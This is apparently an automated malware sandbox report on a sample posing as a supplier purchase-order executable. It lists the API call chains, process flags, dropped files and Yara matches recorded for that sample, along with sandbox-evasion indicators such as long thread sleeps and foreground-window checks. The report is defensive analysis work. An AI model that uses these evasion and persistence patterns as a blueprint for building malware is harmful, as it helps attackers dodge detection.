                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0008F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_000D7F0E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EC1E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found API chain indicative of sandbox detection
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeWindow / User API: threadDelayed 9994Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeWindow / User API: foregroundWindowGot 1591Jump to behavior
                                Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 2326
                                Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 7628
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe TID: 4304Thread sleep time: -99940s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7236Thread sleep time: -7740000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\splwow64.exeLast function: Thread delayed
                                Source: C:\Windows\splwow64.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeThread sleep count: Count: 9994 delay: -10Jump to behavior
                                Source: Yara matchFile source: 00000001.00000002.4549568281.000000000411C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.4540189896.0000000003430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.4538842367.0000000003158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3704, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBDD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00EBDD92
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF2044
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00EF219F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EF24A9
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00EE6B3F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00EE6E4A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00EEF350
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00EEFDD2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EEFD47 FindFirstFileW,FindClose,1_2_00EEFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C2044
